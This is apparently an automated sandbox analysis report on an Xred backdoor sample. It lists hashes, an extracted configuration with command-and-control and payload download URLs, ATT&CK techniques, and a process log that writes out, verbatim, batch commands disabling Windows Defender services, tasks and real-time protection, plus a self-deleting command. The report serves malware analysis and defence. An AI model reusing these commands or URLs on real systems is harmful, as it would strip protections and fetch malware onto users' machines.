xred | 1743f12fa6cad132ecbec87a60d1b3da0f106aa28c32b3a425348c0f7a108df1

Analysis

max time kernel
116s
max time network
110s
platform
windows7_x64
resource
win7-20241010-en
resource tags

arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
submitted
22-11-2024 11:42

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

1743f12fa6cad132ecbec87a60d1b3da0f106aa28c32b3a425348c0f7a108df1.exe
Size

3.6MB
MD5

49587b86bd87a9fb71c8ad078e36b9bd
SHA1

7221a8436832cf30b046be552ad82116f3164ec4
SHA256

1743f12fa6cad132ecbec87a60d1b3da0f106aa28c32b3a425348c0f7a108df1
SHA512

b418b4676a155d7edf25bfc8ecf160cdb59c4b2a6d370682a5894a68db5344e9d94b3941790df2ffce37efebb1cdf6862cb1391db335102aabf73872f3724226
SSDEEP

98304:Snsmtk2ajqXpy05Q0N1rsYSZ6BoXh1kkypSH3Oh5Bemg/:cLT405QYtsTEB08T8HehLvU

Score

10^/10

xred backdoor defense_evasion discovery evasion macro persistence spyware stealer trojan

Malware Config

Extracted

Family

xred

xred.mooo.com

Attributes

email
[email protected]
payload_url
http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978

https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download

https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1

http://xred.site50.net/syn/SUpdate.ini

https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download

https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1

http://xred.site50.net/syn/Synaptics.rar

https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download

https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1

http://xred.site50.net/syn/SSLLibrary.dll

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs 10 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

Processes:

reg.exereg.exereg.exereg.exereg.exe

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	reg.exe

Modifies security service 2 TTPs 1 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

Processes:

reg.exe

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4"	reg.exe

Xred
Xred is backdoor written in Delphi.
backdoor xred
Xred family
xred

Detected Nirsoft tools 1 IoCs

Free utilities often used by attackers which can steal passwords, product keys, etc.

Processes:

resource	yara_rule
behavioral1/memory/2712-35-0x000000001B470000-0x000000001B7B2000-memory.dmp	Nirsoft

NirSoft WebBrowserPassView 1 IoCs

Password recovery tool for various web browsers

Processes:

resource	yara_rule
behavioral1/memory/2712-35-0x000000001B470000-0x000000001B7B2000-memory.dmp	WebBrowserPassView

Suspicious Office macro 2 IoCs

Office document equipped with macros.

macro

Processes:

resource
behavioral1/files/0x00080000000193c7-136.dat
behavioral1/files/0x000700000001975a-147.dat

Deletes itself 1 IoCs

Processes:

cmd.exe

pid	Process
2936	cmd.exe

Drops startup file 2 IoCs

Processes:

1743f12fa6cad132ecbec87a60d1b3da0f106aa28c32b3a425348c0f7a108df1.exe

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Update Manager1131629.exe	1743f12fa6cad132ecbec87a60d1b3da0f106aa28c32b3a425348c0f7a108df1.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Update Manager1131629.exe	1743f12fa6cad132ecbec87a60d1b3da0f106aa28c32b3a425348c0f7a108df1.exe

Executes dropped EXE 4 IoCs

Processes:

RtkBtManServ.exe._cache_RtkBtManServ.exeSynaptics.exe._cache_Synaptics.exe

pid	Process
2264	RtkBtManServ.exe
2712	._cache_RtkBtManServ.exe
2964	Synaptics.exe
2500	._cache_Synaptics.exe

Loads dropped DLL 6 IoCs

Processes:

RtkBtManServ.exeSynaptics.exe

pid	Process
2264	RtkBtManServ.exe
2264	RtkBtManServ.exe
2264	RtkBtManServ.exe
2264	RtkBtManServ.exe
2964	Synaptics.exe
2964	Synaptics.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

RtkBtManServ.exe

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver = "C:\\ProgramData\\Synaptics\\Synaptics.exe"	RtkBtManServ.exe

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow	ioc
6	api64.ipify.org
7	api64.ipify.org

Modifies Security services 2 TTPs 4 IoCs

Modifies the startup behavior of a security service.

defense_evasion

Modify Registry

T1112

Impair Defenses

T1562

Processes:

reg.exereg.exereg.exereg.exe

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdBoot\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdFilter\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdNisDrv\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdNisSvc\Start = "4"	reg.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

Synaptics.exeEXCEL.EXERtkBtManServ.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Synaptics.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RtkBtManServ.exe

Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

EXCEL.EXE

pid	Process
2128	EXCEL.EXE

Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

._cache_Synaptics.exe

description	pid	Process
Token: SeDebugPrivilege	2500	._cache_Synaptics.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

EXCEL.EXE

pid	Process
2128	EXCEL.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

1743f12fa6cad132ecbec87a60d1b3da0f106aa28c32b3a425348c0f7a108df1.execmd.execmd.exeRtkBtManServ.exe

description	pid	Process	procid_target
PID 2304 wrote to memory of 2264	2304	1743f12fa6cad132ecbec87a60d1b3da0f106aa28c32b3a425348c0f7a108df1.exe	30
PID 2304 wrote to memory of 2264	2304	1743f12fa6cad132ecbec87a60d1b3da0f106aa28c32b3a425348c0f7a108df1.exe	30
PID 2304 wrote to memory of 2264	2304	1743f12fa6cad132ecbec87a60d1b3da0f106aa28c32b3a425348c0f7a108df1.exe	30
PID 2304 wrote to memory of 2264	2304	1743f12fa6cad132ecbec87a60d1b3da0f106aa28c32b3a425348c0f7a108df1.exe	30
PID 2304 wrote to memory of 2796	2304	1743f12fa6cad132ecbec87a60d1b3da0f106aa28c32b3a425348c0f7a108df1.exe	31
PID 2304 wrote to memory of 2796	2304	1743f12fa6cad132ecbec87a60d1b3da0f106aa28c32b3a425348c0f7a108df1.exe	31
PID 2304 wrote to memory of 2796	2304	1743f12fa6cad132ecbec87a60d1b3da0f106aa28c32b3a425348c0f7a108df1.exe	31
PID 2304 wrote to memory of 2936	2304	1743f12fa6cad132ecbec87a60d1b3da0f106aa28c32b3a425348c0f7a108df1.exe	33
PID 2304 wrote to memory of 2936	2304	1743f12fa6cad132ecbec87a60d1b3da0f106aa28c32b3a425348c0f7a108df1.exe	33
PID 2304 wrote to memory of 2936	2304	1743f12fa6cad132ecbec87a60d1b3da0f106aa28c32b3a425348c0f7a108df1.exe	33
PID 2796 wrote to memory of 2896	2796	cmd.exe	35
PID 2796 wrote to memory of 2896	2796	cmd.exe	35
PID 2796 wrote to memory of 2896	2796	cmd.exe	35
PID 2936 wrote to memory of 2676	2936	cmd.exe	36
PID 2936 wrote to memory of 2676	2936	cmd.exe	36
PID 2936 wrote to memory of 2676	2936	cmd.exe	36
PID 2796 wrote to memory of 2860	2796	cmd.exe	37
PID 2796 wrote to memory of 2860	2796	cmd.exe	37
PID 2796 wrote to memory of 2860	2796	cmd.exe	37
PID 2796 wrote to memory of 2928	2796	cmd.exe	38
PID 2796 wrote to memory of 2928	2796	cmd.exe	38
PID 2796 wrote to memory of 2928	2796	cmd.exe	38
PID 2796 wrote to memory of 2944	2796	cmd.exe	39
PID 2796 wrote to memory of 2944	2796	cmd.exe	39
PID 2796 wrote to memory of 2944	2796	cmd.exe	39
PID 2796 wrote to memory of 2892	2796	cmd.exe	40
PID 2796 wrote to memory of 2892	2796	cmd.exe	40
PID 2796 wrote to memory of 2892	2796	cmd.exe	40
PID 2796 wrote to memory of 2696	2796	cmd.exe	41
PID 2796 wrote to memory of 2696	2796	cmd.exe	41
PID 2796 wrote to memory of 2696	2796	cmd.exe	41
PID 2796 wrote to memory of 1664	2796	cmd.exe	42
PID 2796 wrote to memory of 1664	2796	cmd.exe	42
PID 2796 wrote to memory of 1664	2796	cmd.exe	42
PID 2796 wrote to memory of 2972	2796	cmd.exe	43
PID 2796 wrote to memory of 2972	2796	cmd.exe	43
PID 2796 wrote to memory of 2972	2796	cmd.exe	43
PID 2796 wrote to memory of 2292	2796	cmd.exe	44
PID 2796 wrote to memory of 2292	2796	cmd.exe	44
PID 2796 wrote to memory of 2292	2796	cmd.exe	44
PID 2796 wrote to memory of 2300	2796	cmd.exe	45
PID 2796 wrote to memory of 2300	2796	cmd.exe	45
PID 2796 wrote to memory of 2300	2796	cmd.exe	45
PID 2264 wrote to memory of 2712	2264	RtkBtManServ.exe	46
PID 2264 wrote to memory of 2712	2264	RtkBtManServ.exe	46
PID 2264 wrote to memory of 2712	2264	RtkBtManServ.exe	46
PID 2264 wrote to memory of 2712	2264	RtkBtManServ.exe	46
PID 2796 wrote to memory of 2668	2796	cmd.exe	47
PID 2796 wrote to memory of 2668	2796	cmd.exe	47
PID 2796 wrote to memory of 2668	2796	cmd.exe	47
PID 2796 wrote to memory of 2588	2796	cmd.exe	48
PID 2796 wrote to memory of 2588	2796	cmd.exe	48
PID 2796 wrote to memory of 2588	2796	cmd.exe	48
PID 2796 wrote to memory of 1616	2796	cmd.exe	49
PID 2796 wrote to memory of 1616	2796	cmd.exe	49
PID 2796 wrote to memory of 1616	2796	cmd.exe	49
PID 2796 wrote to memory of 1496	2796	cmd.exe	50
PID 2796 wrote to memory of 1496	2796	cmd.exe	50
PID 2796 wrote to memory of 1496	2796	cmd.exe	50
PID 2796 wrote to memory of 2764	2796	cmd.exe	51
PID 2796 wrote to memory of 2764	2796	cmd.exe	51
PID 2796 wrote to memory of 2764	2796	cmd.exe	51
PID 2796 wrote to memory of 912	2796	cmd.exe	52
PID 2796 wrote to memory of 912	2796	cmd.exe	52

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\1743f12fa6cad132ecbec87a60d1b3da0f106aa28c32b3a425348c0f7a108df1.exe
"C:\Users\Admin\AppData\Local\Temp\1743f12fa6cad132ecbec87a60d1b3da0f106aa28c32b3a425348c0f7a108df1.exe"
1⤵
- Drops startup file
- Suspicious use of WriteProcessMemory
PID:2304
- C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe
  "C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe" ZhXl39BlhP84+Y4kurA8wpehxxqA0X22IMYZ6Vpiqs4dZ/dz5UA2Tb+U/iGKkkMhRfjtyz9vomtAmiZ6v/tV+IYsjRx4+L2/5YGewvzjN62Wv5GoipVCSSXdg3i5Ozj1eysOh1VZunkSsbrAA0IhD6bSb45CB0b3wAxzgNcSXBY=
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Adds Run key to start application
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2264
- - C:\Users\Admin\AppData\Local\Temp\._cache_RtkBtManServ.exe
    "C:\Users\Admin\AppData\Local\Temp\._cache_RtkBtManServ.exe" ZhXl39BlhP84+Y4kurA8wpehxxqA0X22IMYZ6Vpiqs4dZ/dz5UA2Tb+U/iGKkkMhRfjtyz9vomtAmiZ6v/tV+IYsjRx4+L2/5YGewvzjN62Wv5GoipVCSSXdg3i5Ozj1eysOh1VZunkSsbrAA0IhD6bSb45CB0b3wAxzgNcSXBY=
    3⤵
    - Executes dropped EXE
    PID:2712
  - - C:\Windows\system32\WerFault.exe
      C:\Windows\system32\WerFault.exe -u -p 2712 -s 604
      4⤵
      PID:1756
- - C:\ProgramData\Synaptics\Synaptics.exe
    "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    PID:2964
  - - C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe
      "C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe" InjUpdate
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:2500
    - - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 2500 -s 1544
        5⤵
        
        PID:1836
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\dav.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2796
- - C:\Windows\system32\reg.exe
    reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
    3⤵
    PID:2896
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
    3⤵
    PID:2860
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
    3⤵
    PID:2928
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
    3⤵
    PID:2944
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:2892
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:2696
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:1664
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:2972
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:2292
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
    3⤵
    PID:2300
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f┬┤
    3⤵
    PID:2668
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
    3⤵
    PID:2588
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
    3⤵
    PID:1616
- - C:\Windows\system32\reg.exe
    reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
    3⤵
    PID:1496
- - C:\Windows\system32\reg.exe
    reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
    3⤵
    PID:2764
- - C:\Windows\system32\schtasks.exe
    schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
    3⤵
    PID:912
- - C:\Windows\system32\schtasks.exe
    schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
    3⤵
    PID:2852
- - C:\Windows\system32\schtasks.exe
    schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
    3⤵
    PID:1532
- - C:\Windows\system32\schtasks.exe
    schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
    3⤵
    PID:776
- - C:\Windows\system32\schtasks.exe
    schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
    3⤵
    PID:2424
- - C:\Windows\system32\reg.exe
    reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
    3⤵
    PID:2516
- - C:\Windows\system32\reg.exe
    reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
    3⤵
    PID:980
- - C:\Windows\system32\reg.exe
    reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
    3⤵
    PID:824
- - C:\Windows\system32\reg.exe
    reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
    3⤵
    PID:712
- - C:\Windows\system32\reg.exe
    reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
    3⤵
    PID:2480
- - C:\Windows\system32\reg.exe
    reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
    3⤵
    - Modifies Security services
    PID:2064
- - C:\Windows\system32\reg.exe
    reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
    3⤵
    - Modifies Security services
    PID:2484
- - C:\Windows\system32\reg.exe
    reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
    3⤵
    - Modifies Security services
    PID:884
- - C:\Windows\system32\reg.exe
    reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
    3⤵
    - Modifies Security services
    PID:1440
- - C:\Windows\system32\reg.exe
    reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
    3⤵
    - Modifies security service
    PID:2032
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\1743f12fa6cad132ecbec87a60d1b3da0f106aa28c32b3a425348c0f7a108df1.exe"
  2⤵
  - Deletes itself
  - Suspicious use of WriteProcessMemory
  PID:2936
- - C:\Windows\system32\choice.exe
    choice /C Y /N /D Y /T 3
    3⤵
    PID:2676

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2128

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\._cache_RtkBtManServ.exe

Filesize
2.8MB

MD5
88ab0bb59b0b20816a833ba91c1606d3

SHA1
72c09b7789a4bac8fee41227d101daed8437edeb

SHA256
f4fb42c8312a6002a8783e2a1ab4571eb89e92cd192b1a21e8c4582205c37312

SHA512
05cff2ca00ba940d9371c469bce6ffb4795c845d77525b8a1d4919f708296e66c0a6f3143c5964f5e963955e4f527a70624651113e72dc977f5ef40fa0276857

Download Submit
C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe

Filesize
3.6MB

MD5
375ebefe4e4dcd98b568e22d6d8c52a0

SHA1
718f7a1f3802683635a634869325707c22aa8975

SHA256
1a105a1bfc6590df3476b51de2382e9b7388c5bf49c9c1969b6160d93e22410f

SHA512
ab60f03ac17dbeb83a899231ad29112ea2bfdd8a0c257811bf82fc3f2aa1119ea30c670d3a6d843c39b0bce377068a9626794838ab83c65bf70a142d77c39415

Download Submit
C:\Users\Admin\AppData\Local\Temp\Um3HiIbN.xlsm

Filesize
24KB

MD5
ea017399125a1200216c7e42851c20d5

SHA1
e82f1e12b2a2839d5107d2f84819ca2e84a92131

SHA256
ecc643db1485dc8f8c289e498fa58bebb07db73a1e3bde4aa6a61416da3bc735

SHA512
633650395a99e91c0daf187b0e3d3a31b1fca5d9cab9fe9929f905e2d150a66fb2c58ac084ec9c3447c7d0226737ed0c1ee1c4302160c27f7364b29651a4841a

Download Submit
C:\Users\Admin\AppData\Local\Temp\Um3HiIbN.xlsm

Filesize
17KB

MD5
e566fc53051035e1e6fd0ed1823de0f9

SHA1
00bc96c48b98676ecd67e81a6f1d7754e4156044

SHA256
8e574b4ae6502230c0829e2319a6c146aebd51b7008bf5bbfb731424d7952c15

SHA512
a12f56ff30ea35381c2b8f8af2446cf1daa21ee872e98cad4b863db060acd4c33c5760918c277dadb7a490cb4ca2f925d59c70dc5171e16601a11bc4a6542b04

Download Submit
C:\Users\Admin\AppData\Local\Temp\Um3HiIbN.xlsm

Filesize
31KB

MD5
714bfa533e26229b30404e3729d8a274

SHA1
c959aea51623b5ab07d29bb7731415030cd2b06a

SHA256
591ab0096cc0511e13b31cd6c50b4800b65e809782bf8a80ce388ad5e4c3c09d

SHA512
f5617dd5b6a0556fa907d15e462a579a94b46a9979b2451a2a150a8931ae1d41c9d1ef1bc09e63f75d29d0eec10c8a24d90bda921a33d527a15be5f67b8f5edf

Download Submit
C:\Users\Admin\AppData\Local\Temp\Um3HiIbN.xlsm

Filesize
28KB

MD5
cd4297cd4d9825482104af0cb468dab5

SHA1
46c7b82953bfc3d2f36ed118bba712aaf370203d

SHA256
e77da6328941a12d3b08f153b82234805c1b3da0b8ce75275fea065fa7a7c901

SHA512
49db3ca25fd814e16feec44f46435b777904eafde14de5e44ecf3721fb1bba9272489eac7f126911a4ebb1f9a001257159c4cc7dd78b45d71d2ed0158b557cde

Download Submit
C:\Users\Admin\AppData\Local\Temp\Um3HiIbN.xlsm

Filesize
29KB

MD5
c1ca02aa3e2f8fe4dba22294b0667683

SHA1
28394d4e50bd5b1d1039793c522cee1a0544ea59

SHA256
231f44c2d2d278a4ed133286f5acd5e093ad093fea9aecf63d0165d3e796da09

SHA512
af63e9635af786646f29df9b86b7d7f5f960e4fa633ae7f734902e1a23286ed0fd4783d7b4a956b4b5993cce1742bccb087d46f64e351f5c1649aba57461606f

Download Submit
C:\Users\Admin\AppData\Local\Temp\Um3HiIbN.xlsm

Filesize
26KB

MD5
b9853a9b13f5554627b7db4a635df290

SHA1
52d3ed3dc4b99457ea355c700991966800cb94a2

SHA256
879bee476796a34f44519906d005318855b47ef9d1aa52842c34ea81b578bebe

SHA512
c52d2628d2c8e514ab30119f45c6070cd2cc8f5afec9daef7ff26c88dd5740a2d9d6631bb12bb4d96a60137c05eb438bf2ddb0c97c2c43597614c0d32a5a6d5c

Download Submit
C:\Users\Admin\AppData\Local\Temp\bfsvc.cfg

Filesize
529B

MD5
5242530a2b65089696f3cf8e5ee02ff7

SHA1
d604293148cdd953b3368c54920c043cffe9e1c1

SHA256
239a1d9844ddbd0e650f8e5de69a2a40067106a79878fa4948a8039f1573b781

SHA512
7aafe122d3b7b9d377f689a872c2306c3b04d5a8a7e4df69b65370e48356db416b5cacc6681a1f7315d0ad730fd12b651115a81bd4c880033e5ef89fa605c39a

Download Submit
C:\Users\Admin\AppData\Local\Temp\config

Filesize
106B

MD5
74aa06530b7e38626a9f0f68cbf3c627

SHA1
2aa33dc8b29fe9b5f7a890bf926a80da4c8f099f

SHA256
3c25abc197d8864ded7d967b3d52df30da4f8602c86f2bbddbc27927e88919e2

SHA512
ec20859322fe256edf6aaa99618ef0a5305399c9bc4590c08155eeb503ac9cb9680a347dd457b3bf32256f4261e1dabf2a3b2e3a68b278cf7108fa19d4758b3b

Download Submit
C:\Users\Admin\AppData\Local\Temp\dav.bat

Filesize
3KB

MD5
fc3c88c2080884d6c995d48e172fbc4f

SHA1
cb1dcc479ad2533f390786b0480f66296b847ad3

SHA256
1637ce704a463bd3c91a38aa02d1030107670f91ee3f0dd4fa13d07a77ba2664

SHA512
4807d3bd44a3197d1a9dcf709a1e70e1cf3bf71fe1a9fa1479441b598154c282a620208557a4415a34d23ceb4fd32dda41edbb940b46acb2f00c696648703bf1

Download Submit
C:\Users\Admin\Desktop\~$WatchGrant.xlsx

Filesize
165B

MD5
ff09371174f7c701e75f357a187c06e8

SHA1
57f9a638fd652922d7eb23236c80055a91724503

SHA256
e4ba04959837c27019a2349015543802439e152ddc4baf4e8c7b9d2b483362a8

SHA512
e4d01e5908e9f80b7732473ec6807bb7faa5425e3154d5642350f44d7220af3cffd277e0b67bcf03f1433ac26a26edb3ddd3707715b61d054b979fbb4b453882

Download Submit
memory/2128-56-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2264-43-0x0000000000400000-0x0000000000795000-memory.dmp

Filesize
3.6MB

Download
memory/2264-13-0x0000000000220000-0x0000000000221000-memory.dmp

Filesize
4KB

Download
memory/2304-0-0x000007FEF5A93000-0x000007FEF5A94000-memory.dmp

Filesize
4KB

Download
memory/2304-1-0x00000000013B0000-0x000000000174A000-memory.dmp

Filesize
3.6MB

Download
memory/2500-183-0x0000000000CA0000-0x0000000000CD2000-memory.dmp

Filesize
200KB

Download
memory/2500-83-0x000000001B610000-0x000000001B6C0000-memory.dmp

Filesize
704KB

Download
memory/2500-181-0x0000000000560000-0x000000000056C000-memory.dmp

Filesize
48KB

Download
memory/2500-180-0x0000000000690000-0x00000000006C0000-memory.dmp

Filesize
192KB

Download
memory/2500-182-0x00000000006C0000-0x00000000006DA000-memory.dmp

Filesize
104KB

Download
memory/2500-54-0x0000000001360000-0x000000000163A000-memory.dmp

Filesize
2.9MB

Download
memory/2500-184-0x000000001B890000-0x000000001B932000-memory.dmp

Filesize
648KB

Download
memory/2712-25-0x00000000012D0000-0x00000000015AA000-memory.dmp

Filesize
